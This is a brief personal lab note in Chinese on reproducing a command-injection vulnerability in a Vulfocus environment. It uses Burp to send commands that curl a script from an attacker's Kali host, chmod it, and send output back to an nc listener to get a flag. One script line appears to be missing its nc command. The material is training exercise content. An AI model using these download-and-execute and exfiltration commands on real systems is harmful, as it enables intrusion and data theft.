注:个人笔记,并不详细,仅供参考。
漏洞环境
在VULFOCUS
中复现该漏洞
- 启动镜像并访问80端口的映射端口
- 打开bp ,在输入框输入127.0.0.1 ,进行抓包,然后发送到中继器
- 可以使用执行curl命令下载sh脚本到服务器,再执行的方式,将结果nc到kali回显执行的命令。
- 在kali 中新建
111.sh
脚本,内容为:ls /tmp | 10.9.47.209 8890
,
- 在kali桌面打开终端,开启http服务
python3 -m http.server 80
- 在服务器bp 中进行远程下载
curl 10.9.47.209/111.sh > /tmp/111.sh
上传成功
- 给上传的脚本进行赋权
chmod 777 /tmp/111.sh
- 在kali开启监听,并执行该脚本
开启监听:
nc -lnvp 8890
执行脚本:
- 获得flag